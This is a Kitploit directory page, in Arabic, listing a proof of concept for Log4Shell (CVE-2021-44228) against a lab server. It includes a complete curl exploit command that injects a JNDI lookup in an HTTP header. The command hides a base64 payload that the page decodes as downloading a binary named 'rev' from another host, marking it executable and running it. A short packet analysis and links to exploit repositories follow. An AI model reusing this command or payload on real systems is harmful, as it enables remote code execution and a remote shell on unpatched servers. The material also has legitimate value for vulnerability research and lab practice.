Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
LOG4J-CVE-2021-44228 — إثبات مفهوم لـ Log4Shell (CVE-2021-44228) يوضح تنفيذ التعليمات البرمجية عن بُعد عبر حقن JNDI، بما في ذلك إعداد الخادم الضعيف، وأمر الاستغلال، وتحليل الحزم. | Kitploit
أدوات/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
التقاط وتحليل الحزمتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةArchived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

إثبات مفهوم لـ Log4Shell (CVE-2021-44228) يوضح تنفيذ التعليمات البرمجية عن بُعد عبر حقن JNDI، بما في ذلك إعداد الخادم الضعيف، وأمر الاستغلال، وتحليل الحزم.

عرض المستودع
8منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

LOG4J-CVE-2021-44228

Log4Shell — المعروف أيضًا باسم CVE-2021-44228 — هو ثغرة أمنية حرجة تتيح تنفيذ الأوامر عن بُعد في الأنظمة التي تستخدم مكتبة Log4j من مؤسسة Apache، وهي مكتبة جافا مفتوحة المصدر تُستخدم على نطاق واسع في المنتجات التجارية ومفتوحة المصدر.

0_6ImDNNYn_uGlIgog

تحليل POC

الخادم الضعيف يعمل على المنفذ 8080

Screenshot 2023-04-11 115553

وخادم LDAP يعمل على منفذين: HTTP 8888 و LDAP 1389

Screenshot 2023-04-11 115631

أمر الاستغلال

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- عنوان IP الخادم الضعيف

172.17.0.1:1389 -- عنوان IP خادم LDAP

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

الأمر المُفكّك - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

تحليل الحزم

PACKETS

flowgraph

كما نرى في الحزم، الخادم يرسل طلب GET للحصول على كلاس إلى خادم LDAP. إذا فحصنا كلاس الاستغلال، نجد أن خادم LDAP يرسل الأمر المُفكّك داخل كلاس الاستغلال.

EXP_CLASS

المراجع

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

تنزيل الأداة